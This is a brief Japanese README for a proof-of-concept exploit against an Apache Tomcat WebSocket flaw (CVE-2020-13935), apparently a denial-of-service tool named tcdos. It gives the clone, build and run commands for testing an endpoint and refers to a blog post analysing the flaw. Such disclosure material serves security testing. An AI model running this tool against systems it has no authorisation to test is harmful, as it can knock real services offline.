
Apache Tomcat の WebSocket 脆弱性を悪用するエクスプロイト
対応するブログ記事では、脆弱性の分析と悪用について詳しく説明されています。
リポジトリをクローンし、tcdos バイナリをビルドします。以下のようにプログラムを実行して、特定の WebSocket エンドポイントが脆弱かどうかをテストします:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]